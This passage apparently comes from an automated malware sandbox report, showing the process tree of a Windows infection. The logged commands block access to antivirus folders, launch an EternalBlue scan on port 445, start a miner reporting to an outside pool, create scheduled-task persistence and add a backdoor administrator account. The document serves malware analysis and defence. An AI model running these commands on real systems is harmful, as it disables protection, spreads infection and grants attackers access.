                                                                                                                                  PID:2784
                                                                                                                                  • C:\Windows\system32\icacls.exe
                                                                                                                                    icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)
                                                                                                                                    5⤵
                                                                                                                                      PID:1300
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                    4⤵
                                                                                                                                      PID:2632
                                                                                                                                      • C:\Windows\system32\icacls.exe
                                                                                                                                        icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                        5⤵
                                                                                                                                        • Modifies file permissions
                                                                                                                                        PID:2708
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                      4⤵
                                                                                                                                        PID:2796
                                                                                                                                        • C:\Windows\system32\icacls.exe
                                                                                                                                          icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                          5⤵
                                                                                                                                          • Modifies file permissions
                                                                                                                                          PID:2380
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                        4⤵
                                                                                                                                          PID:1912
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                            5⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:1384
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                          4⤵
                                                                                                                                            PID:3024
                                                                                                                                            • C:\Windows\system32\icacls.exe
                                                                                                                                              icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                              5⤵
                                                                                                                                              • Modifies file permissions
                                                                                                                                              PID:2552
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                            4⤵
                                                                                                                                              PID:1740
                                                                                                                                              • C:\Windows\system32\icacls.exe
                                                                                                                                                icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                5⤵
                                                                                                                                                  PID:1984
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                4⤵
                                                                                                                                                  PID:784
                                                                                                                                                  • C:\Windows\system32\icacls.exe
                                                                                                                                                    icacls "C:\Program Files\Common Files\McAfee" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                    5⤵
                                                                                                                                                    • Modifies file permissions
                                                                                                                                                    PID:1444
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "c:\program files\Rainmeter" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                  4⤵
                                                                                                                                                    PID:2996
                                                                                                                                                    • C:\Windows\system32\icacls.exe
                                                                                                                                                      icacls "c:\program files\Rainmeter" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                      5⤵
                                                                                                                                                      • Modifies file permissions
                                                                                                                                                      PID:1088
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "c:\program files\Loaris Trojan Remover" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                    4⤵
                                                                                                                                                      PID:2692
                                                                                                                                                      • C:\Windows\system32\icacls.exe
                                                                                                                                                        icacls "c:\program files\Loaris Trojan Remover" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                        5⤵
                                                                                                                                                        • Modifies file permissions
                                                                                                                                                        PID:2984
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                      4⤵
                                                                                                                                                        PID:1376
                                                                                                                                                        • C:\Windows\system32\icacls.exe
                                                                                                                                                          icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                          5⤵
                                                                                                                                                          • Modifies file permissions
                                                                                                                                                          PID:2284
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                        4⤵
                                                                                                                                                          PID:2916
                                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                                            icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                            5⤵
                                                                                                                                                              PID:2240
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                            4⤵
                                                                                                                                                              PID:2640
                                                                                                                                                              • C:\Windows\system32\icacls.exe
                                                                                                                                                                icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                5⤵
                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                PID:1908
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                              4⤵
                                                                                                                                                                PID:876
                                                                                                                                                                • C:\Windows\system32\icacls.exe
                                                                                                                                                                  icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                  PID:3096
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:3112
                                                                                                                                                                  • C:\Windows\system32\icacls.exe
                                                                                                                                                                    icacls "C:\Program Files\Process Lasso" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:3144
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:3128
                                                                                                                                                                      • C:\Windows\system32\icacls.exe
                                                                                                                                                                        icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                        PID:3172
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:3184
                                                                                                                                                                        • C:\Windows\system32\icacls.exe
                                                                                                                                                                          icacls "C:\Program Files\Ravantivirus" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:3216
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:3200
                                                                                                                                                                            • C:\Windows\system32\icacls.exe
                                                                                                                                                                              icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                              PID:3244
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:3256
                                                                                                                                                                              • C:\Windows\system32\icacls.exe
                                                                                                                                                                                icacls "C:\ProgramData\Evernote" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                5⤵
                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                PID:3288
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:3280
                                                                                                                                                                                • C:\Windows\system32\icacls.exe
                                                                                                                                                                                  icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                  PID:3316
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:3328
                                                                                                                                                                                  • C:\Windows\system32\icacls.exe
                                                                                                                                                                                    icacls "C:\ProgramData\WavePad" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                    5⤵
                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                    PID:3360
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:3352
                                                                                                                                                                                    • C:\Windows\system32\icacls.exe
                                                                                                                                                                                      icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                      PID:3388
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:3400
                                                                                                                                                                                      • C:\Windows\system32\icacls.exe
                                                                                                                                                                                        icacls "C:\ProgramData\RobotDemo" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:3432
                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:3416
                                                                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                                                                            icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                            PID:3460
                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:3472
                                                                                                                                                                                            • C:\Windows\system32\icacls.exe
                                                                                                                                                                                              icacls "C:\ProgramData\PuzzleMedia" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:3504
                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:3488
                                                                                                                                                                                                • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                  icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                  PID:3532
                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:3544
                                                                                                                                                                                                  • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                    icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                    PID:3576
                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:3560
                                                                                                                                                                                                    • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                      icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                      PID:3608
                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:3620
                                                                                                                                                                                                      • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                        icacls "C:\ProgramData\FingerPrint" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:3652
                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:3636
                                                                                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                            icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                            PID:3680
                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:3688
                                                                                                                                                                                                            • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                              icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                              PID:3792
                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:3720
                                                                                                                                                                                                              • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                PID:3800
                                                                                                                                                                                                          • C:\ProgramData\RealtekHD\taskhost.exe
                                                                                                                                                                                                            "C:\ProgramData\RealtekHD\taskhost.exe"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Modifies visiblity of hidden/system files in Explorer
                                                                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                            • NTFS ADS
                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                            PID:768
                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c ipconfig /flushdns
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:2696
                                                                                                                                                                                                                • C:\Windows\system32\ipconfig.exe
                                                                                                                                                                                                                  ipconfig /flushdns
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                  • Gathers network information
                                                                                                                                                                                                                  PID:2684
                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c gpupdate /force
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:2608
                                                                                                                                                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                    gpupdate /force
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                      PID:1020
                                                                                                                                                                                                                  • C:\ProgramData\Setup\Packs.exe
                                                                                                                                                                                                                    C:\ProgramData\Setup\Packs.exe -ppidar
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                    PID:3148
                                                                                                                                                                                                                  • C:\ProgramData\RealtekHD\sc.exe
                                                                                                                                                                                                                    C:\ProgramData\RealtekHD\sc.exe -pnaxui
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                    PID:3272
                                                                                                                                                                                                                  • C:\ProgramData\RealtekHD\start.exe
                                                                                                                                                                                                                    C:\ProgramData\RealtekHD\start.exe
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:2184
                                                                                                                                                                                                                    • C:\ProgramData\RealtekHD\rundll.exe
                                                                                                                                                                                                                      C:\ProgramData\RealtekHD\rundll.exe
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                      PID:1088
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c "system.exe TCP 192.168.1.1 445 150 /save"
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                        PID:3664
                                                                                                                                                                                                                        • C:\ProgramData\RealtekHD\system.exe
                                                                                                                                                                                                                          system.exe TCP 192.168.1.1 445 150 /save
                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                          PID:1524
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c "system.exe TCP 10.127.0.190/16 445 150 /save"
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                        PID:2220
                                                                                                                                                                                                                        • C:\ProgramData\RealtekHD\system.exe
                                                                                                                                                                                                                          system.exe TCP 10.127.0.190/16 445 150 /save
                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                          PID:2268
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c "Eternalblue-2.2.0.exe --inconfig Eternalblue-2.2.0.xml --NetworkTimeout 60 --TargetIp Scan --TargetPort 445 --Target WIN72K8R2"
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                        • System Time Discovery
                                                                                                                                                                                                                        PID:2224
                                                                                                                                                                                                                        • C:\ProgramData\RealtekHD\Eternalblue-2.2.0.exe
                                                                                                                                                                                                                          Eternalblue-2.2.0.exe --inconfig Eternalblue-2.2.0.xml --NetworkTimeout 60 --TargetIp Scan --TargetPort 445 --Target WIN72K8R2
                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                          • System Time Discovery
                                                                                                                                                                                                                          PID:1668
                                                                                                                                                                                                                  • C:\ProgramData\WindowsTask\audiodg.exe
                                                                                                                                                                                                                    C:\ProgramData\WindowsTask\audiodg.exe
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                    PID:2240
                                                                                                                                                                                                                  • C:\ProgramData\WindowsTask\MicrosoftHost.exe
                                                                                                                                                                                                                    C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://185.139.69.167:3333 -u CPU --donate-level=1 -k -t4
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                    PID:1296
                                                                                                                                                                                                              • C:\ProgramData\Setup\svchost.exe
                                                                                                                                                                                                                C:/ProgramData/Setup/svchost.exe -pnaxui
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                PID:676
                                                                                                                                                                                                                • C:\ProgramData\Setup\IP.exe
                                                                                                                                                                                                                  "C:\ProgramData\Setup\IP.exe"
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • NTFS ADS
                                                                                                                                                                                                                  PID:880
                                                                                                                                                                                                                • C:\ProgramData\Setup\smss.exe
                                                                                                                                                                                                                  "C:\ProgramData\Setup\smss.exe"
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                  PID:848
                                                                                                                                                                                                                  • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                    "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                    PID:2128
                                                                                                                                                                                                                  • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                    "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                    PID:1072
                                                                                                                                                                                                                  • C:\ProgramData\Windows Tasks Service\winserv.exe
                                                                                                                                                                                                                    "C:\ProgramData\Windows Tasks Service\winserv.exe"
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                    PID:1580
                                                                                                                                                                                                                    • C:\ProgramData\Windows Tasks Service\winserv.exe
                                                                                                                                                                                                                      "C:\ProgramData\Windows Tasks Service\winserv.exe" -second
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                      PID:3008
                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c net user John 12345 /add
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:1912
                                                                                                                                                                                                                      • C:\Windows\system32\net.exe
                                                                                                                                                                                                                        net user John 12345 /add
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                          PID:1708
                                                                                                                                                                                                                          • C:\Windows\system32\net1.exe
                                                                                                                                                                                                                            C:\Windows\system32\net1 user John 12345 /add
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                              PID:1036
                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:1392
                                                                                                                                                                                                                            • C:\Windows\system32\net.exe
                                                                                                                                                                                                                              net localgroup "Администраторы" John /add
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                PID:596
                                                                                                                                                                                                                                • C:\Windows\system32\net1.exe
                                                                                                                                                                                                                                  C:\Windows\system32\net1 localgroup "Администраторы" John /add
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                    PID:2600
                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:872
                                                                                                                                                                                                                                  • C:\Windows\system32\net.exe
                                                                                                                                                                                                                                    net localgroup "Пользователи удаленного рабочего стола" John /add
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                      PID:2040
                                                                                                                                                                                                                                      • C:\Windows\system32\net1.exe
                                                                                                                                                                                                                                        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                          PID:444
                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:1988
                                                                                                                                                                                                                                        • C:\Windows\system32\net.exe
                                                                                                                                                                                                                                          net localgroup "Пользователи удаленного управления" john /add" John /add
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                            PID:2160
                                                                                                                                                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                                                                                                                                                              C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                PID:1892
                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                              PID:1028
                                                                                                                                                                                                                                              • C:\Windows\system32\net.exe
                                                                                                                                                                                                                                                net localgroup "Administrators" John /add
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                  PID:1292
                                                                                                                                                                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\net1 localgroup "Administrators" John /add
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                      PID:1352
                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:2376
                                                                                                                                                                                                                                                    • C:\Windows\system32\net.exe
                                                                                                                                                                                                                                                      net localgroup "Administradores" John /add
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                        PID:1056
                                                                                                                                                                                                                                                        • C:\Windows\system32\net1.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\net1 localgroup "Administradores" John /add
